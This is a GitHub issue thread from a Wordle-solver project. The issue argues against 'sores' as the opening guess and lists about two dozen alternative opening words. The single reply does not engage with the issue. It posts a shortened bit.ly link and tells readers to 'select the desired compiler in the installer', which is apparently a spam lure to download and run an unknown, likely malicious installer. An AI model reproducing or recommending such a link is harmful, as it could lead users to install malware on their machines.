### ISSUE TITLE
Opening words.

### ISSUE THREAD

**Issue by SageAndromeda** [darienyoder/software-engineering-team-beta#9]
The program suggests `sores` as the opening guess because of its high score. I do not think this is the best possible opening due to the repetition of `s`. Here is a list of words we could hard code in to use for opening instead. 
```
ADIEU 
AISLE 
ARISE 
AROSE 
AUDIO 
CARTE 
CRANE 
CRATE 
DREAM 
GREAT 
HEART 
HOUSE 
IRATE 
LEAST 
RAISE 
SALET 
SLANT 
SLATE 
STALE 
STARE 
STEAM 
TEARS 
TRACE 
TRAIN 
```
I suggest we either pick one to open with every time or randomly pick one of these from a list. `Adieu` is the most popular opening, and WordleBot likes `Slate` the best.

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer
